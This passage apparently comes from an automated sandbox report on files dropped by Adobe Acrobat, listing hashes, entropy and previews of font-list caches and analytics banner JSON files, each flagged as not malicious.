                                                                                      Entropy (8bit):3.118387027113849
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:kKDGDL9UswDLL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:bG2DnLNkPlE99SNxAhUe/3
                                                                                      MD5:63B6991337A0B624E5979E0040FC77D3
                                                                                      SHA1:04610AFF032AD801AE45C22BC68FA8BA28D580E5
                                                                                      SHA-256:4798159FD852652F9070571D9A483EB3FD309D402538F0D230E64BE3156A7D39
                                                                                      SHA-512:440A1E4112866811F4913CD2C481F0C6D1E254A80F26749AE8851EBBCBA396CC5F1CB9D080D406328A5532128565D57D55403462DF86233C6E1906B756AAD7DF
                                                                                      Malicious:false
                                                                                      Preview:p...... ........|..Gsd..(....................................................... ........G..@.......&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...

                                                                                      C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeCMapFnt23.lst (copy)

                                                                                      Download File
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                      File Type:PostScript document text
                                                                                      Category:dropped
                                                                                      Size (bytes):1233
                                                                                      Entropy (8bit):5.233980037532449
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
                                                                                      MD5:8BA9D8BEBA42C23A5DB405994B54903F
                                                                                      SHA1:FC1B1646EC8A7015F492AA17ADF9712B54858361
                                                                                      SHA-256:862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
                                                                                      SHA-512:26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
                                                                                      Malicious:false
                                                                                      Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D

                                                                                      C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeFnt23.lst.7792

                                                                                      Download File
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                      File Type:PostScript document text
                                                                                      Category:dropped
                                                                                      Size (bytes):1233
                                                                                      Entropy (8bit):5.233980037532449
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
                                                                                      MD5:8BA9D8BEBA42C23A5DB405994B54903F
                                                                                      SHA1:FC1B1646EC8A7015F492AA17ADF9712B54858361
                                                                                      SHA-256:862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
                                                                                      SHA-512:26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
                                                                                      Malicious:false
                                                                                      Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D

                                                                                      C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeSysFnt23.lst (copy)

                                                                                      Download File
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                      File Type:PostScript document text
                                                                                      Category:dropped
                                                                                      Size (bytes):1233
                                                                                      Entropy (8bit):5.233980037532449
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
                                                                                      MD5:8BA9D8BEBA42C23A5DB405994B54903F
                                                                                      SHA1:FC1B1646EC8A7015F492AA17ADF9712B54858361
                                                                                      SHA-256:862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
                                                                                      SHA-512:26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
                                                                                      Malicious:false
                                                                                      Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D

                                                                                      C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache\AcroFnt23.lst (copy)

                                                                                      Download File
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                      File Type:PostScript document text
                                                                                      Category:dropped
                                                                                      Size (bytes):10880
                                                                                      Entropy (8bit):5.214360287289079
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp
                                                                                      MD5:B60EE534029885BD6DECA42D1263BDC0
                                                                                      SHA1:4E801BA6CA503BDAE7E54B7DB65BE641F7C23375
                                                                                      SHA-256:B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856
                                                                                      SHA-512:52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE
                                                                                      Malicious:false
                                                                                      Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D

                                                                                      C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache\AdobeFnt23.lst.7792

                                                                                      Download File
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                      File Type:PostScript document text
                                                                                      Category:dropped
                                                                                      Size (bytes):10880
                                                                                      Entropy (8bit):5.214360287289079
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp
                                                                                      MD5:B60EE534029885BD6DECA42D1263BDC0
                                                                                      SHA1:4E801BA6CA503BDAE7E54B7DB65BE641F7C23375
                                                                                      SHA-256:B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856
                                                                                      SHA-512:52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE
                                                                                      Malicious:false
                                                                                      Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D

                                                                                      C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\ACROBAT_READER_MASTER_SURFACEID

                                                                                      Download File
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                      File Type:JSON data
                                                                                      Category:dropped
                                                                                      Size (bytes):295
                                                                                      Entropy (8bit):5.368778227593046
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:YEQXJ2HXFd+BjJWkVoZcg1vRcR0Y5DoAvJM3g98kUwPeUkwRe9:YvXKXFsqZc0vKsGMbLUkee9
                                                                                      MD5:AF6A619F2B7F59DEA37A2A21323815D0
                                                                                      SHA1:8E22BA53198B4EDA97161A6BFAACAE19EF9AFBE3
                                                                                      SHA-256:F52D5048DFD124D67D574D5FCEAE2A23F114A8BD160F157B014B0A54019F2990
                                                                                      SHA-512:C65E876349E946381C8F4AA7DF0F5388A790D8BAE471DC980D48F61E8F0EE22535895F005FF64C745C5A10653FCCAA1A9A66C10861000F4610603F9A8190392D
                                                                                      Malicious:false
                                                                                      Preview:{"analyticsData":{"responseGUID":"2c3503f6-fce3-4403-9dcd-b34c60d2f508","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736809798060,"statusCode":200,"surfaceID":"ACROBAT_READER_MASTER_SURFACEID","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                      C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Home_View_Surface

                                                                                      Download File
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                      File Type:JSON data
                                                                                      Category:dropped
                                                                                      Size (bytes):294
                                                                                      Entropy (8bit):5.3177510003882
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:YEQXJ2HXFd+BjJWkVoZcg1vRcR0Y5DoAvJfBoTfXpnrPeUkwRe9:YvXKXFsqZc0vKsGWTfXcUkee9
                                                                                      MD5:B924963BE3ADF234AD0A8E2FD9E8A68F
                                                                                      SHA1:FAE747E77532670498086C4AB66D76CD843C5A46
                                                                                      SHA-256:0835CFFD10D6E46DC84822D8DE04EB6590E9BD9B6D97A1F43D8E4CAF91E62169
                                                                                      SHA-512:9FDEF813ABFE439B11C4627C8540D07C6E23C14D71ADD7BB2230B8AF4A36ED2BA1D1A5C100773511F81F1D174BAA3A5CA1AC75A75A46E1F0852EAE110116A942
                                                                                      Malicious:false
                                                                                      Preview:{"analyticsData":{"responseGUID":"2c3503f6-fce3-4403-9dcd-b34c60d2f508","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736809798060,"statusCode":200,"surfaceID":"DC_FirstMile_Home_View_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                      C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Right_Sec_Surface

                                                                                      Download File
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                      File Type:JSON data
                                                                                      Category:dropped
                                                                                      Size (bytes):294
                                                                                      Entropy (8bit):5.295223249591828
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:YEQXJ2HXFd+BjJWkVoZcg1vRcR0Y5DoAvJfBD2G6UpnrPeUkwRe9:YvXKXFsqZc0vKsGR22cUkee9
                                                                                      MD5:0CEA9D99B4FCB84D17B25D518BF396CE
                                                                                      SHA1:994C5A0675EB2112AF327FDFC440FA0A08B4DF01
                                                                                      SHA-256:696C7A1F006DB979EE76DC636D3C85E219DFD077B256806E0AEDA3682B0A5628
                                                                                      SHA-512:1D8A55D27907890C1406B52CEB04BB72E8B631F2FAEA127194EF2DB03495827CDDA47040A66B0E3C8EF5D5BF004470185A54804E533A9EB44ACBFEE26C1F0F1A
                                                                                      Malicious:false
                                                                                      Preview:{"analyticsData":{"responseGUID":"2c3503f6-fce3-4403-9dcd-b34c60d2f508","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736809798060,"statusCode":200,"surfaceID":"DC_FirstMile_Right_Sec_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                      C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_READER_LAUNCH_CARD

                                                                                      Download File
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                      File Type:JSON data
                                                                                      Category:dropped
                                                                                      Size (bytes):285
                                                                                      Entropy (8bit):5.355978728218936
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:YEQXJ2HXFd+BjJWkVoZcg1vRcR0Y5DoAvJfPmwrPeUkwRe9:YvXKXFsqZc0vKsGH56Ukee9
                                                                                      MD5:015C6D3203E057A04FF598BEC3FAB7BF
                                                                                      SHA1:CCCF73BDA08CF9931C16921148CC9A1533EE1ADD
                                                                                      SHA-256:6AD556E36505719AC96150F69A9C79BEDF4DBF1505FFADE12005213D0FF47904
                                                                                      SHA-512:F70750DBFFB94D0A44CF48FBC6423AEBED94EB1379250A9BE945243F66BB6F1E13D10B0D42F6E956719C3E605FD83ACB1B21C70A43AC023F54F205CF19A40A3F
                                                                                      Malicious:false
                                                                                      Preview:{"analyticsData":{"responseGUID":"2c3503f6-fce3-4403-9dcd-b34c60d2f508","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736809798060,"statusCode":200,"surfaceID":"DC_READER_LAUNCH_CARD","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                      C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Convert_LHP_Banner

                                                                                      Download File
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                      File Type:JSON data
                                                                                      Category:dropped
                                                                                      Size (bytes):1123
                                                                                      Entropy (8bit):5.684478645217369
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:Yv6XdzvSpLgE9cQx8LennAvzBvkn0RCmK8czOCCSD:Yvq6hgy6SAFv5Ah8cv/D
                                                                                      MD5:C74CABB16FC9E731F73B2F38599B6DB6
                                                                                      SHA1:95664D1A514CA1FD8F5047BF93D9062D90E764BF
                                                                                      SHA-256:DE4F034F0CDED3B6B90C8421C22E2E183336BBD9B01E717FADC36F1A8D494F00
                                                                                      SHA-512:7A0D0996129020A710AC3262A9D9481A790A017B461A090B51D468FD2D0CAD97C374C1E01D7E1AC987BC3D24CF6119ACC9B1FA348800B21DA2D3096548379D83
                                                                                      Malicious:false
                                                                                      Preview:{"analyticsData":{"responseGUID":"2c3503f6-fce3-4403-9dcd-b34c60d2f508","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736809798060,"statusCode":200,"surfaceID":"DC_Reader_Convert_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Convert_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_1","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"d5bba1ae-6009-4d23-8886-fd4a474b8ac9","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Convert_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IkNvbnZlcnRQREZSZHJSSFBBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkV4cG9ydCBQREZzIHRvIE1pY3Jvc29mdCBXb3JkIGFuZCBFeGNlbC4ifSwidGNh

                                                                                      C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Banner

                                                                                      Download File
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                      File Type:JSON data
                                                                                      Category:dropped
                                                                                      Size (bytes):289
                                                                                      Entropy (8bit):5.302109734062179
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:YEQXJ2HXFd+BjJWkVoZcg1vRcR0Y5DoAvJf8dPeUkwRe9:YvXKXFsqZc0vKsGU8Ukee9
                                                                                      MD5:1E5B7D8C96A7F84B1EDCCB35E40A6A4A
                                                                                      SHA1:4583C2408A0DD44A4E9662C2B4B770BCF70CCA11
                                                                                      SHA-256:67097B6BB8CCE69F09713CFE42C9CE1655297E14526868AF7C76CB7461D6863D
                                                                                      SHA-512:AAB26D0677CA647DC8C11BE2DD52DD54E23A8881CA28EF291F6ED8E0489050C901C23AAA51867B3866F7D09B61E1FE9E17C021FAAD74C21A3FA7443A5106B271
                                                                                      Malicious:false
                                                                                      Preview:{"analyticsData":{"responseGUID":"2c3503f6-fce3-4403-9dcd-b34c60d2f508","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736809798060,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                      C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Retention

                                                                                      Download File
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                      File Type:JSON data
                                                                                      Category:dropped
                                                                                      Size (bytes):292
                                                                                      Entropy (8bit):5.305640869499285
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:YEQXJ2HXFd+BjJWkVoZcg1vRcR0Y5DoAvJfQ1rPeUkwRe9:YvXKXFsqZc0vKsGY16Ukee9
                                                                                      MD5:FA545B53406F68D36AB7E763F2DA673D
                                                                                      SHA1:1FA0E7E60B175E855980FE54BD51BEF1E223EC97
                                                                                      SHA-256:351FA4B3A0AD7CDB772A859C95EC211C3540C427CB2A0BE23FE4273BB14C830C
                                                                                      SHA-512:38AE8D66161D1161EB2F5CC4873B98E3E67687ECAD0FB09BA256B3E3EF48AB0B3B2EF7AFD6F77137525E04025173F11DBF2DA1DE84B86D3108D06FF8B988B835
                                                                                      Malicious:false
                                                                                      Preview:{"analyticsData":{"responseGUID":"2c3503f6-fce3-4403-9dcd-b34c60d2f508","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736809798060,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                      C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Edit_LHP_Banner

                                                                                      Download File
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                      File Type:JSON data
                                                                                      Category:dropped
                                                                                      Size (bytes):289
                                                                                      Entropy (8bit):5.3114478511675385
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:YEQXJ2HXFd+BjJWkVoZcg1vRcR0Y5DoAvJfFldPeUkwRe9:YvXKXFsqZc0vKsGz8Ukee9
                                                                                      MD5:5B250B17FF2AEA5864A65E4664177934
                                                                                      SHA1:0FB5794D159FC5B8CF20828AA272D9F5AFC6542D
                                                                                      SHA-256:F12059698FB129CE28B254C357BE54EE3CB6DF8867960F37666608083028E7ED
                                                                                      SHA-512:943C8501BB5D38A743AB14FAB6DBD6474A3B50C89CBC96E248D297CDC92F36354A35AB1D0891B91D0E5EA8031EA25C95A43DC07A080F83BE6A203A74E26DB778
                                                                                      Malicious:false
                                                                                      Preview:{"analyticsData":{"responseGUID":"2c3503f6-fce3-4403-9dcd-b34c60d2f508","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736809798060,"statusCode":200,"surfaceID":"DC_Reader_Edit_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                      C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Home_LHP_Trial_Banner

                                                                                      Download File
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                      File Type:JSON data
                                                                                      Category:dropped
                                                                                      Size (bytes):295
                                                                                      Entropy (8bit):5.329320723843258
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:YEQXJ2HXFd+BjJWkVoZcg1vRcR0Y5DoAvJfzdPeUkwRe9:YvXKXFsqZc0vKsGb8Ukee9
                                                                                      MD5:C873301693FBA5E2B2450BF62A542A94
                                                                                      SHA1:BBA1CE76F07BA45D23E1A11796E524A8F1D42B5A
                                                                                      SHA-256:1E113FCB21FB9B284481077AFA6162D92CFD143166CFC0F05E23E8E131EC5F58
                                                                                      SHA-512:AD36950EC204006B8F5575AD1FE905F82F1E0B370843ACF999822A9433DC25BD2C88C1044B2140A016A75C88257B2C2AA61886AF3E3600A62062C7C68168A544
                                                                                      Malicious:false
                                                                                      Preview:{"analyticsData":{"responseGUID":"2c3503f6-fce3-4403-9dcd-b34c60d2f508","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736809798060,"statusCode":200,"surfaceID":"DC_Reader_Home_LHP_Trial_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                      C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_More_LHP_Banner

                                                                                      Download File
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                      File Type:JSON data
                                                                                      Category:dropped
                                                                                      Size (bytes):289
                                                                                      Entropy (8bit):5.309565165436026
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:YEQXJ2HXFd+BjJWkVoZcg1vRcR0Y5DoAvJfYdPeUkwRe9:YvXKXFsqZc0vKsGg8Ukee9
                                                                                      MD5:380102BF2D096FBACF05EF546BE77C6C
                                                                                      SHA1:984E8BBBE16FFF16516928508AF29636054457D4
                                                                                      SHA-256:6644132DA00E98B713A17AE01E412FFD2057B7AAF3E045FB25E99329733794F6
                                                                                      SHA-512:10CCB911AAAA55C9F7F72DFAFF51E0C5C991015B5FCA157FEC2260BBB64C3EE4E98C5B07F152223CBE4A65E0E50BB032F7C4C807DD6AF92E0EA44A8AC322CB08
                                                                                      Malicious:false
                                                                                      Preview:{"analyticsData":{"responseGUID":"2c3503f6-fce3-4403-9dcd-b34c60d2f508","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736809798060,"statusCode":200,"surfaceID":"DC_Reader_More_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                      C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Banner

                                                                                      Download File
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                      File Type:JSON data
                                                                                      Category:dropped
                                                                                      Size (bytes):284
                                                                                      Entropy (8bit):5.29578393905883
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:YEQXJ2HXFd+BjJWkVoZcg1vRcR0Y5DoAvJf+dPeUkwRe9:YvXKXFsqZc0vKsG28Ukee9
                                                                                      MD5:415DDD5755190569622C1B4CD9E0102C
                                                                                      SHA1:10AD8C1B7EA09D3B446A571AD8BB1D61A1B24F86
                                                                                      SHA-256:A7FCAAE95708F8F08BE4D7DF3C66744673F35142C9FA9D43BC59299DFE9A6242
                                                                                      SHA-512:2393CBDB5A077EA3E6E50B1EDE1E4A3640141E0C51BE8A2F76558A4DFB9A819DF7EC413184E68A521E352BEE701032DEB0C60686AF7F2E133B80471BB013508C
                                                                                      Malicious:false
                                                                                      Preview:{"analyticsData":{"responseGUID":"2c3503f6-fce3-4403-9dcd-b34c60d2f508","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736809798060,"statusCode":200,"surfaceID":"DC_Reader_RHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                      C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Intent_Banner

                                                                                      Download File
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                      File Type:JSON data
                                                                                      Category:dropped
                                                                                      Size (bytes):291
                                                                                      Entropy (8bit):5.293046523141257
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:YEQXJ2HXFd+BjJWkVoZcg1vRcR0Y5DoAvJfbPtdPeUkwRe9:YvXKXFsqZc0vKsGDV8Ukee9
                                                                                      MD5:E5F90594E29CDDB8D2B593DB673CCC52
